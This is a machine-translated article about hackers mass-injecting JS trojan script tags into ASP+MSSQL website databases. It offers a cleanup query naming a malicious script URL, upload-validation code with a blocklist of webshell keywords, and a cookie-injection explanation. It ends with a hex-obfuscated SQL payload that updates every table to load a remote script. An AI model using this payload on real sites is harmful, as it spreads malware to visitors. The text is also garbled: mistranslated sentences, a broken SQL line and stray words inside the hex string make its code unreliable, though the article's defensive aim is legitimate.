These days, many websites designed with ASP+MSSQL may have experienced the experience of having their SQL databases inserted into JS Trojans by hackers; no, a friend’s website was deceived by hackers.
Each varchar and text field of mssql is automatically inserted into a piece of js code. Even if this piece of code is deleted, if the source is not solved, the js code will be automatically inserted into the database in a few minutes.
After Piao Yi's observation, this is likely to be automatically executed by the program. Hackers first search for vulnerable websites designed with asp+mssql from search engines such as Google and Baidu, and then use injection scanning tools like Xiao Mingzi to scan the entire website. , once a sql injection vulnerability is discovered or uploaded If there are vulnerabilities, hackers use various means to upload their own Trojans, such as Haiyang Trojans; then, the hackers include this website into their broiler list, and add the js codes they want to add to the database at any time, and these codes are often It contains numerous viruses and Trojans, which ultimately poison the computers of users who visit controlled websites.
Although you can perform batch replacement through SQL query analyzer to temporarily solve the problem of inserted js code, if you do not fundamentally solve the vulnerabilities of the entire website, including program and server security permissions, hackers can still invade your website at any time. Website database.
In the SQL query analyzer, you can execute the following code to replace js code in batches:
Copy the code code as follows:
"update table name set field name=replace(field name,'<Script Src=http://cn%75clear3.com/css/c.js></Script>','')"
flymorn carefully checked the website and found several security issues:
First, the website has an upload vulnerability; although uploading files requires administrator authentication and file format authentication of uploaded files, administrator authentication uses cookies, and cookies can be forged, and if uploaded If you do not make any judgment on the content of the file after taking the picture, then the picture Trojan is likely to be uploaded.
Solutions: 1 Delete the upload file function (not practical); 2 Modify the upload user verification to session verification; 3 Verify the content of the uploaded file, and delete it if it is a picture Trojan; you can refer to the following verification code:
Copy the code code as follows:
''================ Determine whether the uploaded file contains an illegal string start================
set MyFile = server.CreateObject("Scripting.FileSystemObject")
set MyText = MyFile.OpenTextFile(Server.mappath(filePath), 1) 'Read text file
sTextAll = lcase(MyText.ReadAll)
MyText.close
set MyFile = nothing
sStr="<%|.getfolder|.createfolder|.deletefolder|.createdirectory|.deletedirectory|.saveas|wscript.shell|script.encode|server.|.createobject|execute|activexobject|language="
sNoString = split(sStr,"|")
for i=0 to ubound(sNoString)
if instr(sTextAll,sNoString(i)) then
set filedel = server.CreateObject("Scripting.FileSystemObject")
filedel.deletefile Server.mappath(filePath)
set filedel = nothing
Response.Write("<script>alert('There is a problem with the file you uploaded, the upload failed!');history.back();</script>")
Response.End
end if
next
''================== Determine whether the uploaded file contains illegal string end====================
Second, the website has a cookie injection vulnerability. Due to the program design, in order to reduce server overhead, all users use cookies for authentication after logging in. This cookie stores the user's ID and NAME. As we all know, cookies are often forged by hackers. This is one of them; in addition, , some external parameters do not use strict request.form and request.querystring to obtain content. For simplicity, request("id") is used.
We know that ASP's request first obtains the content from form and querystring. If these two are empty, the content must be obtained from cookies. People often consider the SQL injection of request.form and request.querystring in programming. Therefore, request.form and request.querystring are generally filtered for sql injection; but they forget to filter the injection in the cookie mode. Let's take a look at the following sql statement:
Copy the code code as follows:
SQL="select * from table name whereid")
If this id happens to get the value through cookies, then think about it, what a terrible thing it is! The injector can easily forge a fake cookie named id because the cookie with this id is assigned to it by the server. This cookie can be forged into a piece of code similar to the following:
Copy the code code as follows:
dEcLaRe @s vArChAr(4000);sEt @s=cAsT(0x6445634c615265204074207641724368417228323535292c406320764172436841722832353529206445634c6
15265207441624c655f637572736f5220635572536f5220466f522073456c456354206 IT Talent Network () 12e6e416d452c622e6e416d
452046724f6d207359734f624a6543745320612c735973436f4c754d6e53206220774865526520612e694
94420416e4420612e78547950653d27752720416e442028622e78547950653d3939206f5220622e78547950653d3
335206f5220622e78547950653d323331206f5220622e78547950653d31363729206f50654e207441624c655f6375
72736f52206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c4063207768
696c6528404066457443685f7374617475733d302920624567496e20657865632827557044615465205b272b40742
b275d20734574205b272b40632b275d3d727472696d28636f6e7665727428764172436841722c5b272b40632b275
d29292b27273c2f7469746c653e3c736372697074207372633d687474703a2f2f2536622536622533362532652537
352537332f312e6a733e3c2f7363726970743e27272729206645744368206e6578742046724f6d207441624c655f6
37572736f5220694e744f2040742c406320654e6420634c6f5365207441624c655f637572736f52206445416c4c6f4
3615465207441624c655f637572736f520d0a aS vArChAr(4000));exec(@s);--